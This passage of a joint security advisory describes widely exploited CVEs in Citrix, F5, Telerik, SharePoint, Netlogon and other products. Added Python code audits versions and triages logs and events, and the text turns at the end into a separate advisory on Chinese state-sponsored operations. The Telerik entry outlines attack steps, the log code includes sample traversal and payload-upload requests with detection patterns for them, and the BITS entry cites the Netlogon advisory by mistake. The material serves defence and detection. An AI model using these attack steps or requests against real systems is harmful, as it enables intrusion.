  • Implement the appropriate refresh build according to the vulnerability details outlined by the vendor: Citrix: Mitigation Steps for CVE-2019-19781
  • If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list).

Detection Methods

Vulnerable Technologies and Versions
Citrix ADC and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0

References and Additional Guidance

 

Table 3: CVE-2019-11510 Vulnerability Details

Table 4: CVE-2018-13379 Vulnerability Details

 

Table 5: CVE-2020-5902 Vulnerability Details

F5 BIG-IP Traffic Management User Interface (CVE-2020-5902)

Vulnerability Description
The Traffic Management User Interface (TMUI), also referred to as the Configuration Utility, has an RCE vulnerability in undisclosed pages. 

CVSS 3.0
Critical

Vulnerability Discussion, IOCs, and Malware Campaigns
This vulnerability allows for unauthenticated attackers, or authenticated users, with network access to the Configuration Utility (through the BIG-IP management port and/or self IPs) to execute arbitrary system commands, create or delete files, disable services, and execute arbitrary Java code. This vulnerability may result in complete system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected. 

Fix
Upgrade to Secure Versions Available
 

Recommended Mitigations
Download and install a fixed version of the software from a vendor-approved resource. If it is not possible to update quickly, restrict access via the following actions.

  • Address unauthenticated and authenticated attackers on self IPs by blocking all access.
  • Address unauthenticated attackers on the management interface by restricting access.

Detection Methods

Vulnerable Technologies and Versions
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT) 15.1.0, 15.0.0-15.0.1, 14.1.0-14.1.2, 13.1.0-13.1.3, 12.1.0-12.1.5, and 11.6.1-11.6.5 are vulnerable.

References

 

Table 6: CVE-2020-15505 Vulnerability Details

MobileIron Core & Connector (CVE-2020-15505)

Vulnerability Description

MobileIron Core & Connector, Sentry, and Monitoring and Reporting Database (RDB) software are vulnerable to RCE via unspecified vectors.

CVSS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

CVE-2020-15505 is an RCE vulnerability in MobileIron Core & Connector versions 10.3 and earlier. This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.

Multiple APTs have been observed exploiting this vulnerability to gain unauthorized access.

Fix

Patch Available

Recommended Mitigations

  • Download and install a fixed version of the software from a vendor-approved resource.

Detection Methods

  • None. Manually check your software version to see if it is susceptible to this vulnerability. 

Vulnerable Technologies and Versions

MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0, and 10.6.0.0; Sentry versions 9.7.2 and earlier and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier are vulnerable.

References

 

Table 7: CVE-2020-0688 Vulnerability Details

 

Table 8: CVE-2019-3396 Vulnerability Details

 

Table 9: CVE-2017-11882 Vulnerability Details

Microsoft Office Memory Corruption (CVE-2017-11882)

Vulnerability Description

Microsoft Office is prone to a memory corruption vulnerability allowing an attacker to run arbitrary code, in the context of the current user, by failing to properly handle objects in memory. It is also known as the “Microsoft Office Memory Corruption Vulnerability.” 

Cyber actors continued to exploit this four-year-old vulnerability in Microsoft Office that the U.S. Government publicly assessed last year was the most frequently targeted. Cyber actors most likely continue to exploit this vulnerability because Microsoft Office use is ubiquitous worldwide, the vulnerability is ideal for phishing campaigns, and it enables RCE on vulnerable systems.

CVSS 3.0

High

Vulnerability Discussion, IOCs, and Malware Campaigns

Microsoft Equation Editor, a component of Microsoft Office, contains a stack buffer overflow vulnerability that enables RCE on a vulnerable system. The component was compiled on November 9, 2000. Without any further recompilation, it was used in all currently supported versions of Microsoft Office. Microsoft Equation Editor is an out-of-process COM server that is hosted by eqnedt32.exe, meaning it runs as its own process and can accept commands from other processes.

Data execution prevention (DEP) and address space layout randomization (ASLR) should protect against such attacks. However, because of the manner in which eqnedt32.exe was linked, it will not use these features, subsequently allowing code execution. Being an out-of-process COM server, protections specific to Microsoft Office such as EMET and Windows Defender Exploit Guard are not applicable to eqnedt32.exe unless applied system-wide. This provides the attacker with an avenue to lure targets into opening specially crafted documents, resulting in the ability to execute embedded attacker commands.

Multiple cyber espionage campaigns have taken advantage of this vulnerability. CISA has noted CVE-2017-11882 being exploited to deliver LokiBot malware.

Fix

Patch Available

Recommended Mitigations

Detection Methods

  • Microsoft Defender Antivirus, Windows Defender, Microsoft Security Essentials, and the Microsoft Safety Scanner will all detect and patch this vulnerability.

Vulnerable Technologies and Versions

  • Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 are vulnerable.

References

 

Table 10: CVE-2019-11580 Vulnerability Details

Atlassian Crowd and Crowd Data Center Remote Code Execution (CVE-2019-11580)

Vulnerability Description

Atlassian Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds.

CVSS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits RCE on systems running a vulnerable version of Crowd or Crowd Data Center.

Fix

Patch Available

Recommended Mitigations

  • Atlassian recommends that customers running a version of Crowd below 3.3.0 upgrade to version 3.2.8. For customers running version 3.3.0 or later, Atlassian recommends upgrading to the latest version.
  • Released Crowd and Crowd Data Center version 3.4.4 contains a fix for this issue and is available at https://www.atlassian.com/software/crowd/download.
  • Released Crowd and Crowd Data Center versions 3.0.5, 3.1.6, 3.2.8, and 3.3.5 contain a fix for this issue and are available at https://www.atlassian.com/software/crowd/download-archive.

Detection Methods

Vulnerable Technologies and Versions

All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.

References

 

Table 11: CVE-2018-7600 Vulnerability Details

Drupal Core Multiple Remote Code Execution (CVE-2018-7600)

Vulnerability Description

Drupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allow remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

CVSS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

An RCE vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. Failed exploit attempts may result in a denial-of-service condition. A remote user can send specially crafted data to trigger a flaw in the processing of renderable arrays in the Form Application Programming Interface, or API, and cause the target system to render the user-supplied data and execute arbitrary code on the target system.

Malware campaigns include the Muhstik botnet and XMRig Monero Cryptocurrency mining.

Fix

Patch Available

Recommended Mitigations

  • Upgrade to the most recent version of Drupal 7 or 8 core. If running 7.x, upgrade to Drupal 7.58. If running 8.5.x, upgrade to Drupal 8.5.1.

Detection Methods

Vulnerable Technologies and Versions

  • Drupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are affected.

References
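Deciding from an inventory which hosts still fall inside the affected ranges in Tables 10 and 11 is a version-comparison problem, and one that naive string comparison gets wrong. The following Python is an added example (not Atlassian's, Drupal's, or the advisory's own code) that encodes those ranges and compares versions numerically; the inventory values and the assumption that only the 7.x and 8.x Drupal branches are in scope are this example's own.

```python
import re
from typing import Iterable, Tuple

Version = Tuple[int, ...]


def parse_version(text: str) -> Version:
    """'3.2.8' -> (3, 2, 8). A leading 'v' and trailing qualifiers such as
    '-SNAPSHOT' are ignored (assumption about how your inventory records versions)."""
    m = re.match(r"^\s*v?(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def _cmp_key(v: Version, width: int) -> Version:
    """Right-pad with zeros so that 3.2 and 3.2.0 compare equal."""
    return v + (0,) * (width - len(v))


def in_range(version: Version, first_affected: Version, first_fixed: Version) -> bool:
    """first_affected <= version < first_fixed, compared numerically per component."""
    width = max(len(version), len(first_affected), len(first_fixed))
    return _cmp_key(first_affected, width) <= _cmp_key(version, width) < _cmp_key(first_fixed, width)


# Table 10: each Crowd branch is affected from its first listed version up to,
# but not including, the fixed release for that branch.
CROWD_AFFECTED = [
    ("2.1.0", "3.0.5"),
    ("3.1.0", "3.1.6"),
    ("3.2.0", "3.2.8"),
    ("3.3.0", "3.3.5"),
    ("3.4.0", "3.4.4"),
]

# Table 11: Drupal 7 before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, 8.5.x before 8.5.1.
# Assumption: only the 7.x and 8.x branches named in the table are in scope.
DRUPAL_AFFECTED = [
    ("7.0", "7.58"),
    ("8.0.0", "8.3.9"),
    ("8.4.0", "8.4.6"),
    ("8.5.0", "8.5.1"),
]


def is_affected(version: str, ranges: Iterable[Tuple[str, str]]) -> bool:
    """True if the version string falls inside any (first affected, first fixed) range."""
    v = parse_version(version)
    return any(in_range(v, parse_version(lo), parse_version(hi)) for lo, hi in ranges)


def audit(inventory: dict, ranges) -> dict:
    """{host: version} -> {host: version} limited to hosts still running an affected build."""
    return {host: ver for host, ver in inventory.items() if is_affected(ver, ranges)}


if __name__ == "__main__":
    # Constructed inventory, not real hosts.
    crowd_hosts = {"crowd-a": "3.2.7", "crowd-b": "3.2.8", "crowd-c": "3.10.0"}
    print(audit(crowd_hosts, CROWD_AFFECTED))   # {'crowd-a': '3.2.7'}
    # The string comparison a quick script might use gets crowd-c wrong:
    print("3.10.0" < "3.4.4")                    # True, yet 3.10.0 is newer than 3.4.4
```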

 

Table 12: CVE-2019-18935 Vulnerability Details

Telerik UI for ASP.NET AJAX Insecure Deserialization (CVE-2019-18935)

Vulnerability Description

Telerik User Interface (UI) for ASP.NET does not properly filter serialized input for malicious content. Versions prior to R1 2020 (2020.1.114) are susceptible to remote code execution attacks on affected web servers due to a deserialization vulnerability.

CVSS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

The Telerik UI does not properly sanitize serialized data inputs from the user. This vulnerability leads to the application being vulnerable to RCE attacks that may lead to a full system compromise. A vulnerable HTTP POST parameter, rauPostData, makes use of a vulnerable function/object, AsyncUploadHandler. The object/function uses the JavaScriptSerializer.Deserialize() method, which does not properly sanitize the serialized data during the deserialization process. This issue is attacked by:

  1. Determining the vulnerable function is available/registered:  http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau,
  2. Determining if the version running is vulnerable by querying the UI, and
  3. Creating an object (e.g., malicious mixed-mode DLL with native OS commands or Reverse Shell) and uploading the object via rauPostData parameter along with the proper encryption key.

There were two malware campaigns associated with this vulnerability:

  • Netwalker Ransomware and
  • Blue Mockingbird Monero Cryptocurrency-mining.

Fix

Patch Available

Recommended Mitigations

  • Update to the most recent version of Telerik UI for ASP.NET AJAX (at least 2020.1.114 or later).

Detection Methods

  • ACSC has an example PowerShell script that can be used to identify vulnerable Telerik UI DLLs on Windows web server hosts.
  • Vulnerable hosts should be reviewed for evidence of exploitation. Indicators of exploitation can be found in IIS HTTP request logs and within the Application Windows event log. Details of the above PowerShell script and exploitation detection recommendations are available in ACSC Advisory 2020-004.
  • Exploitation of this and previous Telerik UI vulnerabilities commonly resulted in the installation of web shell malware. NSA provides guidance on detecting and preventing web shell malware.

Vulnerable Technologies and Versions

Telerik UI for ASP.NET AJAX versions prior to R1 2020 (2020.1.114) are affected.

References

 

Table 13: CVE-2019-0604 Vulnerability Details

Microsoft SharePoint Remote Code Execution (CVE-2019-0604)

Vulnerability Description

A vulnerability in an XML deserialization component within Microsoft SharePoint allowed remote attackers to execute arbitrary code on vulnerable Microsoft SharePoint servers.

CVSS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

This vulnerability was typically exploited to install webshell malware on vulnerable hosts. A webshell could be placed in any location served by the associated Internet Information Services (IIS) web server and did not require authentication. These web shells were commonly installed in the Layouts folder within the Microsoft SharePoint installation directory, for example:

C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\<version_number>\Template\Layouts

The xmlSerializer.Deserialize() method does not adequately sanitize user input received from the PickerEntity/ValidateEntity (picker.aspx) functions in the serialized XML payloads. Once the serialized XML payload is deserialized, the XML code is evaluated for relevant XML commands and strings. A user can attack .NET-based XML parsers with XMLNS payloads using the <system:string> tag and embedding malicious operating system commands.

The exploit was used in malware phishing and the WickrMe/Hello Ransomware campaigns.

Fix

Patch Available

Recommended Mitigations

  • Upgrade on-premise installations of Microsoft SharePoint to the latest available version (Microsoft SharePoint 2019) and patch level.
  • On-premise Microsoft SharePoint installations with a requirement to be accessed by internet-based remote staff should be moved behind an appropriate authentication mechanism such as a VPN, if possible.

Detection Methods

  • The patch level of on-premise Microsoft SharePoint installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft SharePoint security advisory.
  • Vulnerable SharePoint servers should be reviewed for evidence of attempted exploitation. ACSC Advisory 2019-125 contains advice on reviewing IIS HTTP request logs for evidence of potential exploitation.
  • NSA provides guidance on detecting and preventing web shell malware.

Vulnerable Technologies and Versions

At the time of the vulnerability release, the following Microsoft SharePoint versions were affected: Microsoft SharePoint 2019, Microsoft SharePoint 2016, Microsoft SharePoint 2013 SP1, and Microsoft SharePoint 2010 SP2.

References
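Tables 2, 12 and 13 each name a request pattern that shows up in web server request logs: the Citrix ADC traversal request, the Telerik RAU handler, and the SharePoint picker.aspx POST. The following Python is an added example, not part of the advisory or of ACSC's tooling, that runs those three indicators over constructed log lines in combined log format; a real Citrix ADC or IIS log needs its own LOG_RE, and the indicator names are this example's own.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Combined-log-style line: client, identity, user, [time], "METHOD target proto", status.
# Assumption: real Citrix ADC and IIS logs use other layouts; adapt LOG_RE to yours.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines, not real captures (RFC 5737 documentation addresses as clients).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2020:03:14:07 +0000] "GET /vpn/index.html HTTP/1.1" 200',
    '203.0.113.5 - - [10/Jan/2020:03:14:09 +0000] "GET /vpn/../vpn/portal/scripts/newbm.pl HTTP/1.1" 200',
    '203.0.113.5 - - [10/Jan/2020:03:14:11 +0000] "POST /vpn/../vpn/portal/scripts/newbm.pl HTTP/1.1" 200',
    '198.51.100.9 - - [10/Jan/2020:03:20:00 +0000] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 200',
    '198.51.100.9 - - [10/Jan/2020:03:20:05 +0000] "POST /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 200',
    '198.51.100.9 - - [10/Jan/2020:03:25:00 +0000] "POST /_layouts/15/Picker.aspx HTTP/1.1" 200',
    '192.0.2.44 - - [10/Jan/2020:03:30:00 +0000] "GET /_layouts/15/start.aspx HTTP/1.1" 200',
]


def has_traversal(path: str) -> bool:
    """True if the (already percent-decoded) path contains a '..' segment."""
    return any(segment == ".." for segment in path.split("/"))


def classify(method: str, target: str) -> list:
    """Return the indicator names a single request matches (empty list if none).

    Matching runs on the raw request target: a normalised path hides the traversal,
    because posixpath.normpath('/vpn/../vpn/portal/scripts/newbm.pl') is just
    '/vpn/portal/scripts/newbm.pl', which looks like an ordinary portal request.
    """
    parts = urlsplit(target)
    path = unquote(parts.path)          # catch %2e%2e as well as a literal ..
    lower = path.lower()
    query = {k.lower(): [v.lower() for v in vals] for k, vals in parse_qs(parts.query).items()}
    findings = []

    # Table 2: Citrix ADC directory traversal reaching the Perl scripts directory.
    if has_traversal(path):
        canonical = posixpath.normpath(path).lower()
        if canonical.startswith("/vpn/portal/scripts/"):
            findings.append("citrix-cve-2019-19781-traversal")
        else:
            findings.append("path-traversal")

    # Table 12: Telerik RAU handler. A GET checks whether the handler is registered,
    # a POST carries rauPostData; both deserve review on patched and unpatched hosts.
    if lower.endswith("telerik.web.ui.webresource.axd") and "rau" in query.get("type", []):
        findings.append("telerik-rau-handler-post" if method == "POST" else "telerik-rau-handler-probe")

    # Table 13: SharePoint picker.aspx receives the serialized XML payload by POST.
    if lower.endswith("/picker.aspx") and method == "POST":
        findings.append("sharepoint-picker-post")

    return findings


def triage(lines) -> list:
    """Parse log lines and return (client, method, target, status, findings) for each hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                     # unparseable line: count these separately in production
        findings = classify(m["method"], m["target"])
        if findings:
            hits.append((m["client"], m["method"], m["target"], int(m["status"]), findings))
    return hits


def summarize(hits) -> dict:
    """Collapse hits to {client: sorted unique indicator names} for a review queue."""
    by_client = defaultdict(set)
    for client, _method, _target, _status, findings in hits:
        by_client[client].update(findings)
    return {client: sorted(names) for client, names in by_client.items()}


if __name__ == "__main__":
    for client, names in summarize(triage(SAMPLE_LOG)).items():
        print(client, names)
```

A 200 status on the traversal or picker request is not proof of success on its own; correlate with new files under the scripts or Layouts directories before treating the host as compromised.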

 

Table 14: CVE-2020-0787 Vulnerability Details

Windows Background Intelligent Transfer Service Elevation of Privilege (CVE-2020-0787)

Vulnerability Description

The Windows Background Intelligent Transfer Service (BITS) is vulnerable to a privilege elevation vulnerability if it improperly handles symbolic links. An actor can exploit this vulnerability to execute arbitrary code with system-level privileges.

CVSS 3.0

High

Vulnerability Discussion, IOCs, and Malware Campaigns

To exploit this vulnerability, an actor would first need to have the ability to execute arbitrary code on a vulnerable Windows host.

Actors exploiting this vulnerability commonly used the proof of concept code released by the security researcher who discovered the vulnerability. If an actor left the proof of concept exploit’s working directories unchanged, then the presence of the following folders could be used as an indicator of exploitation:

C:\Users\<username>\AppData\Local\Temp\workspace
C:\Users\<username>\AppData\Local\Temp\workspace\mountpoint
C:\Users\<username>\AppData\Local\Temp\workspace\bait

The exploit was used in Maze and Egregor ransomware campaigns.

Fix

Patch Available

Recommended Mitigations

  • Apply the security updates as recommended in the Microsoft Netlogon security advisory.

Detection Methods

  • The patch level of all Microsoft Windows installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft BITS security advisory.

Vulnerable Technologies and Versions

Windows 7 for 32-bit and x64-based Systems Service Pack 1, 8.1 for 32-bit and x64-based systems, RT 8.1, 10 for 32-bit and x64-based Systems, 10 1607 for 32-bit and x64-based Systems, 10 1709 for 32-bit and x64-based and ARM64-based Systems, 10 1803 for 32-bit and ARM64-based and x64-based Systems, 10 1809 for 32-bit and ARM64-based and x64-based Systems, 10 1903 for 32-bit and ARM64-based and x64-based Systems, and 10 1909 for 32-bit, ARM64-based, and x64-based Systems are vulnerable.

Windows Server 2008 R2 for x64-based Systems Service Pack 1, 2008 R2 for x64-based Systems Service Pack 1 (Server Core Installation), 2008 for 32-bit Systems Service Pack 2, 2008 for 32-bit Systems Service Pack 2 (Server Core Installation), 2012, 2012 (Server Core Installation), 2012 R2, 2012 R2 (Server Core Installation), 2016, 2016 (Server Core Installation), 2019, 2019 (Server Core Installation), 1803 (Server Core Installation), 1903 (Server Core Installation), and 1909 (Server Core Installation) are also vulnerable.

References

 

Table 15: CVE-2020-1472 Vulnerability Details

Netlogon Elevation of Privilege (CVE-2020-1472)

Vulnerability Description

The Microsoft Windows Netlogon Remote Protocol (MS-NRPC) reuses a known, static, zero-value initialization vector (IV) in AES-CFB8 mode, which could allow an unauthenticated attacker to impersonate a domain-joined computer, including a domain controller, and potentially obtain domain administrator privileges.

CVSS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

To exploit this vulnerability, an actor would first need to have an existing presence on an internal network with network connectivity to a vulnerable Domain Controller, assuming that Domain Controllers are not exposed to the internet.

The immediate effect of successful exploitation is the ability to authenticate to the vulnerable Domain Controller with Domain Administrator level credentials. In compromises exploiting this vulnerability, exploitation was typically followed immediately by dumping all hashes for Domain accounts.

Threat actors were seen combining the MobileIron CVE-2020-15505 vulnerability for initial access, then using the Netlogon vulnerability to facilitate lateral movement and further compromise of target networks.

A nation-state APT group has been observed exploiting this vulnerability.[18]

Fix

Patch Available

Recommended Mitigations

  • Apply the security updates as recommended in the Microsoft Netlogon security advisory.

Detection Methods

  • The patch level of Domain Controllers should be reviewed for the presence of relevant security updates as outlined in the Microsoft Netlogon security advisory.
  • Reviewing and monitoring Windows Event Logs can identify potential exploitation attempts. However, further investigation would still be required to eliminate legitimate activity. Further information on these event logs is available in the ACSC 2020-016 Advisory.

Vulnerable Technologies and Versions

At the time of the vulnerability release, the following Microsoft Windows Server versions were vulnerable: all versions of Windows Server 2019; all versions of Windows Server 2016; Windows Server 2012 R2; Windows Server 2012; Windows Server 2008 R2 SP1; and Windows Server versions 1909/1903/1809.

References
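For the Windows Event Log review recommended in the detection methods above, the following Python is an added example (not Microsoft's or ACSC's code) that triages constructed event records: Security event 4742 computer-account changes made by ANONYMOUS LOGON (SID S-1-5-7), and the Netlogon System-log events 5827 to 5831 that Microsoft added for vulnerable secure-channel connections. It assumes the SIEM preserves the EventData field names and that the set of Domain Controller account names is supplied from inventory.

```python
from collections import Counter

ANONYMOUS_LOGON_SID = "S-1-5-7"

# Netlogon service events that record vulnerable secure-channel connections
# (5827/5828 denied; 5829/5830/5831 allowed). Assumption: they are forwarded
# from the System log of each Domain Controller with their numeric EventID intact.
NETLOGON_VULNERABLE_CHANNEL_EVENTS = {5827, 5828, 5829, 5830, 5831}

# Constructed records, not a real capture. Field names follow the EventData
# names Windows uses for Security event 4742 (assumption: your SIEM keeps them).
CONSTRUCTED_EVENTS = [
    {"EventID": 4742, "Computer": "DC01.corp.example", "SubjectUserSid": "S-1-5-21-1-2-3-1105",
     "SubjectUserName": "svc_deploy", "TargetUserName": "WS042$", "PasswordLastSet": "9/14/2020 09:12:33"},
    {"EventID": 4742, "Computer": "DC01.corp.example", "SubjectUserSid": "S-1-5-7",
     "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "WS042$", "PasswordLastSet": "-"},
    {"EventID": 4742, "Computer": "DC01.corp.example", "SubjectUserSid": "S-1-5-7",
     "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "DC01$", "PasswordLastSet": "9/14/2020 09:30:01"},
    {"EventID": 5829, "Computer": "DC01.corp.example", "SubjectUserSid": "", "TargetUserName": "",
     "Message": "The Netlogon service allowed a vulnerable Netlogon secure channel connection."},
    {"EventID": 4624, "Computer": "DC01.corp.example", "SubjectUserSid": "S-1-5-18",
     "TargetUserName": "jdoe", "PasswordLastSet": "-"},
]


def anonymous_password_reset(event: dict) -> bool:
    """4742 where ANONYMOUS LOGON changed a computer account's password.

    The publicly documented exploitation path changes the machine account password
    over an unauthenticated Netlogon session, so the subject of the resulting 4742
    is S-1-5-7 and Password Last Set holds a timestamp rather than '-' (unchanged).
    """
    return (
        event.get("EventID") == 4742
        and event.get("SubjectUserSid") == ANONYMOUS_LOGON_SID
        and str(event.get("TargetUserName", "")).endswith("$")
        and event.get("PasswordLastSet", "-") not in ("-", "", None)
    )


def triage(events, dc_accounts) -> dict:
    """Split events into what needs immediate action and what needs a follow-up look.

    dc_accounts: set of Domain Controller machine account names, e.g. {'DC01$'}
    (assumption: taken from your directory inventory).
    """
    result = {"critical": [], "suspicious": [], "vulnerable_channel": Counter()}
    for ev in events:
        if anonymous_password_reset(ev):
            bucket = "critical" if ev["TargetUserName"] in dc_accounts else "suspicious"
            result[bucket].append(ev)
        elif ev.get("EventID") in NETLOGON_VULNERABLE_CHANNEL_EVENTS:
            # Legitimate unpatched devices also produce these; the count per DC is a
            # patch-hygiene signal, not proof of exploitation on its own.
            result["vulnerable_channel"][ev.get("Computer", "?")] += 1
    return result


if __name__ == "__main__":
    report = triage(CONSTRUCTED_EVENTS, {"DC01$", "DC02$"})
    for ev in report["critical"]:
        print("CRITICAL: DC account password reset by anonymous session:",
              ev["TargetUserName"], ev["PasswordLastSet"])
    print("vulnerable channel events per DC:", dict(report["vulnerable_channel"]))
```

A critical hit should be followed by the hash-dump check the discussion above implies (a DC password change is usually followed within minutes by directory replication requests from the same source), which needs the replication audit events and is outside this snippet.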

 

For additional general best practices for mitigating cyber threats, see the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity and ACSC’s Essential Eight mitigation strategies.

Additional Resources

Free Cybersecurity Services

CISA offers several free cyber hygiene vulnerability scanning and web application services to help U.S. federal agencies, state and local governments, critical infrastructure, and private organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. For more information about CISA’s free services, or to sign up, email [email protected].

Cyber Essentials

CISA’s Cyber Essentials is a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices.

Cyber.gov.au 

ACSC’s website provides advice and information about how to protect individuals and families, small- and medium-sized businesses, large organizations and infrastructure, and government organizations from cyber threats.

ACSC Partnership Program

The ACSC Partnership Program enables Australian organizations and individuals to engage with ACSC and fellow partners, drawing on collective understanding, experience, skills, and capability to lift cyber resilience across the Australian economy.

Australian organizations, including government and those in the private sector as well individuals, are welcome to sign up at Become an ACSC partner to join.

NCSC 10 Steps

The NCSC offers 10 Steps to Cyber Security, providing detailed guidance on how medium and large organizations can manage their security.

On vulnerabilities specifically, the NCSC has guidance to organizations on establishing an effective vulnerability management process, focusing on the management of widely available software and hardware.


Chinese State-Sponsored Cyber Operations: Observed TTPs


This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9, and MITRE D3FEND™ framework, version 0.9.2-BETA-3. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques and the D3FEND framework for referenced defensive tactics and techniques.

The National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People’s Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. These cyber operations support China’s long-term economic and military development objectives.

This Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis.

To increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors’ Observed Procedures. Note: NSA, CISA, and FBI encourage organization leaders to review CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders for information on this threat to their organization.


Trends in Chinese State-Sponsored Cyber Operations

NSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis:

  • Acquisition of Infrastructure and Capabilities. Chinese state-sponsored cyber actors remain agile and cognizant of the information security community’s practices. These actors make an effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools.

  • Exploitation of Public Vulnerabilities. Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability’s public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see:

  • Encrypted Multi-Hop Proxies. Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection.

Observed Tactics and Techniques

Chinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. A downloadable JSON file is also available on the NSA Cybersecurity GitHub page.

Refer to Appendix A: Chinese State-Sponsored Cyber Actors’ Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations.

Figure 1: Example of tactics and techniques used in various cyber operations.

 

Mitigations

NSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques:

  • Patch systems and equipment promptly and diligently. Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle.
    Note: for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section.

  • Enhance monitoring of network traffic, email, and endpoint systems. Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity. SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.
